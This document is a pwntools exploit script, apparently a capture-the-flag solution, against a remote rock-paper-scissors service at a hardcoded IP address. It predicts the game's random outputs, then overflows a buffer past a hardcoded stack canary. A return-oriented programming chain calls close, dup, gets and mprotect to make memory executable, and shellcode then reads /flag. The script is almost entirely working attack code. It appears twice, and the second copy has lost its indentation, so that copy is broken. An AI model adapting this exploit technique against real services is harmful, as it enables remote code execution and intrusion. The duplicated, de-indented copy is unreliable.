kungfulon/rps.py

## rps.py
#!/usr/bin/env python3

from pwn import *
import ctypes

context.os = 'linux'
context.arch = 'amd64'

LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')

def get_win():
    x = LIBC.rand() % 3
    if x == 0:
        return b'paper'
    if x == 1:
        return b'scissors'
    return b'rock'

canary = b'\x00\x19\x49\x64\x11\x9d\x7d\xed'
base = 0x563e30716000
libc_base = 0x7fed1d73f000
fd = 0x4

shellcode = asm(shellcraft.cat('/flag', fd))

while True:
    try:
        r = remote('34.94.161.34', 12345)
        LIBC.srand(LIBC.time(0))

        pay = get_win().ljust(40, b'\x00') + canary + p64(base + 0x202330) + p64(base + 0xf12)
        r.sendafter('Your choice: ', pay)

        rop  = b''
        rop += p64(base + 0x13eb) # pop rdi; ret
        rop += p64(0x0) # stdin
        rop += p64(libc_base + 0x111970) # close
        rop += p64(base + 0xf0b)

        pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x202300) + p64(base + 0x111F)
        r.sendafter('Your choice: ', pay)

        rop  = b''
        rop += p64(base + 0x13eb) # pop rdi; ret
        rop += p64(fd) # fd
        rop += p64(libc_base + 0x111a00) # dup
        rop += p64(base + 0xf0b)

        pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x2022f8) + p64(base + 0x111F)
        r.sendafter('Your choice: ', pay)

        rop  = b''
        rop += p64(base + 0x13eb) # pop rdi; ret
        rop += p64(base + 0x202100) # buf
        rop += p64(libc_base + 0x86af0) # gets
        rop += p64(base + 0xf0b)

        pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x2022f0) + p64(base + 0x111F)
        r.sendafter('Your choice: ', pay)

        rop  = b'/bin/sh\x00'
        rop += p64(base + 0x13eb) # pop rdi; ret
        rop += p64(base + 0x202000) # buf
        rop += p64(base + 0x13e9) # pop rsi; pop r15; ret
        rop += p64(0x1000) # size
        rop += p64(0x0)
        rop += p64(libc_base + 0x11c371) # pop rdx; pop r12; ret
        rop += p64(0x7) # RWX
        rop += p64(0x0)
        rop += p64(libc_base + 0x11bb00) # mprotect
        rop += p64(libc_base + 0x4543d) # push rsp; ret
        r.sendline(rop + shellcode)

        pay = get_win().ljust(40, b'\x00') + canary + p64(base + 0x202100) + p64(base + 0x111F)
        r.sendafter('Your choice: ', pay)
        r.recvline()

        log.success(r.recvall().decode('ascii'))
        break
    except EOFError:
        r.close()
	#!/usr/bin/env python3

	from pwn import *
	import ctypes

	context.os = 'linux'
	context.arch = 'amd64'

	LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')

	def get_win():
	x = LIBC.rand() % 3
	if x == 0:
	return b'paper'
	if x == 1:
	return b'scissors'
	return b'rock'

	canary = b'\x00\x19\x49\x64\x11\x9d\x7d\xed'
	base = 0x563e30716000
	libc_base = 0x7fed1d73f000
	fd = 0x4

	shellcode = asm(shellcraft.cat('/flag', fd))

	while True:
	try:
	r = remote('34.94.161.34', 12345)
	LIBC.srand(LIBC.time(0))

	pay = get_win().ljust(40, b'\x00') + canary + p64(base + 0x202330) + p64(base + 0xf12)
	r.sendafter('Your choice: ', pay)

	rop = b''
	rop += p64(base + 0x13eb) # pop rdi; ret
	rop += p64(0x0) # stdin
	rop += p64(libc_base + 0x111970) # close
	rop += p64(base + 0xf0b)

	pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x202300) + p64(base + 0x111F)
	r.sendafter('Your choice: ', pay)

	rop = b''
	rop += p64(base + 0x13eb) # pop rdi; ret
	rop += p64(fd) # fd
	rop += p64(libc_base + 0x111a00) # dup
	rop += p64(base + 0xf0b)

	pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x2022f8) + p64(base + 0x111F)
	r.sendafter('Your choice: ', pay)

	rop = b''
	rop += p64(base + 0x13eb) # pop rdi; ret
	rop += p64(base + 0x202100) # buf
	rop += p64(libc_base + 0x86af0) # gets
	rop += p64(base + 0xf0b)

	pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x2022f0) + p64(base + 0x111F)
	r.sendafter('Your choice: ', pay)

	rop = b'/bin/sh\x00'
	rop += p64(base + 0x13eb) # pop rdi; ret
	rop += p64(base + 0x202000) # buf
	rop += p64(base + 0x13e9) # pop rsi; pop r15; ret
	rop += p64(0x1000) # size
	rop += p64(0x0)
	rop += p64(libc_base + 0x11c371) # pop rdx; pop r12; ret
	rop += p64(0x7) # RWX
	rop += p64(0x0)
	rop += p64(libc_base + 0x11bb00) # mprotect
	rop += p64(libc_base + 0x4543d) # push rsp; ret
	r.sendline(rop + shellcode)

	pay = get_win().ljust(40, b'\x00') + canary + p64(base + 0x202100) + p64(base + 0x111F)
	r.sendafter('Your choice: ', pay)
	r.recvline()

	log.success(r.recvall().decode('ascii'))
	break
	except EOFError:
	r.close()